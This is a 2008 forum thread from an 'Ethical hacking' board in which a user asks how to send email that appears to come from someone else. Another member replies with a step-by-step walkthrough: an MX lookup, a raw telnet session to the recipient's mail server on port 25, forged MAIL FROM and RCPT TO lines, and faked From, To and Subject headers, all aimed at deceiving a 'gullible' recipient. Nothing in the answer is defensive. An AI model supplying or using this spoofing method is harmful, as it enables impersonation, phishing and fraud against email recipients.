1. We have moved from vBulletin to XenForo and you are viewing the site in the middle of the move. Though the functional aspect of everything is working fine, we are still working on other changes including the new design on Xenforo.
    Dismiss Notice

Email Forging

Discussion in 'Ethical hacking' started by microapple, Jul 4, 2008.

  1. microapple

    microapple Banned

    Joined:
    Jul 2, 2008
    Messages:
    58
    Likes Received:
    1
    Trophy Points:
    0
    I know you can do this, but how do you make an email look like it was sent from a totally
    different email address? What is the cmd or what ever code to do so.
    THX!
    :crazy:
     
  2. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    When you are connected to a mail exchanger, you CANNOT USE the backspace (delete) key. So any mistakes you make mean you must reconnect or send it as it is. Once you know what's going on, it may be worth setting up a telnet macro to do the entire process for you. That's assuming you'll be doing this a lot.
    For this example, I will be emailing poor_sod@gullible.com, and the email will appear to come from nastygeezer@brutal.com. You can in fact email anybody with this method - the way the internet works means that (almost) anyone with any email address can be fakemailed.
    Every computer you connect to to use this method will look slightly different, but the commands are generic, and should work anywhere.
    And finally - these instructions are written for a Unix user - the method is basically the same for a Windoze user - but if you can't figure out what to change, you probably shouldn't be doing this at all. Some Windoze users don't have NSLookup, if not, you can try IntNet's online NSLookup.


    ____________________________________________________________________________________________________

    Getting mail exchanger data and connecting


    Step 1 - Getting mail exchanger data and connecting
    You must use a program called "nslookup" to look up information about the computer where poor_sod has his email address. In this case, gullible.com. On a standard *nix system, this can be achieved like this:

    Code:
    % /usr/sbin/nslookup -q=MX gullible.com
                    
    Resolved gullible.com to 206.123.6.111...
    [snip]
    mail exchanger: easy.gullible.com
    [snip]
    %
    
    ________________________________________________________________________________________________


    An nslookup will produce quite a lot of data, but the only thing you are looking for is a "mail exchanger" - there are often several, but any of them will do. At this point, we must connect to the mail exchanger using port 25 - this is achieved like this:

    Code:
    % telnet easy.gullible.com 25
    Connecting to easy.gullible.com....
    Escape character is `]
    Gullible ESMTP version 6.6.6 This software copyright (C) 1666 Gullible systems.
    

    ___________________________________________________________________________________

    Identifying


    Now you must tell the computer where you're from, who you are, and who's getting the email.


    Code:
    HELO brutal.com
    250 OK
    
    MAIL FROM: <nastygeezer@brutal.com>
    250 nastygeezer@brutal.com is syntactically correct
    
    RCPT TO: <poor_sod@gullible.com>
    250 poor_sod@gullible.com is syntactically correct
    

    And that's it! The computer has accepted our input just fine! All we need to do now is


    _____________________________________________________________________________________

    The email itself


    What we must do now is make the email look as if it came from a proper email program, rather than us just handtyping it in - this is important. If we don't put in credible data, most email clients will reject it. What we must do is add the headers, and then the email.



    Code:
    DATA
    354 Ready for data - end input with a "." on a new line
    Date: 4/7/108
    Time: 1:05:30 (GMT+300) 
    From: Mr Fake Guy <nastygeezer@brutal.com>
    To: Poor Sod <poor_sod@gullible.com>
    Subject: I'm a nasty geezer.
    
    The email goes here. We've typed the date and time (exactly! look!) 
    and then the names and email addresses of the sender and the recipient,
    and the subject. Then just leave a blank line, and type the email!
    When we want to end, we just do the full stop (period) on a new line
    as the message said...
    
    .
    220 OK (ESMTP id 20023/197A4BB)
    QUIT
    Connection closed by foreign host
    %
    
    Hope this helped you if you have any questions please don't hesitate to ask me
     
  3. microapple

    microapple Banned

    Joined:
    Jul 2, 2008
    Messages:
    58
    Likes Received:
    1
    Trophy Points:
    0
    Thanks for the help.

    Never mind about the ip thing I figured it out...
     
    Last edited: Jul 9, 2008
  4. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    lol no cant tell u about that ip or how i got it sry mate
     
  5. Hyperion113

    Hyperion113 New Member

    Joined:
    Jul 7, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    0
    I am a total noob and am now looking into this whole ethical hacking but i have a question, now if i do send this forged email, then if this person does reply what happens to the email which the recipient of the forged email sends, does it go to the email address used for the forged mail or can it be routed back to you so you can read it.
     
  6. microapple

    microapple Banned

    Joined:
    Jul 2, 2008
    Messages:
    58
    Likes Received:
    1
    Trophy Points:
    0
    Basically no you can't read it unless you have the account from which you sent it.
    If you do that kind-of defeats the purpose...
     
    Last edited: Jul 9, 2008

Share This Page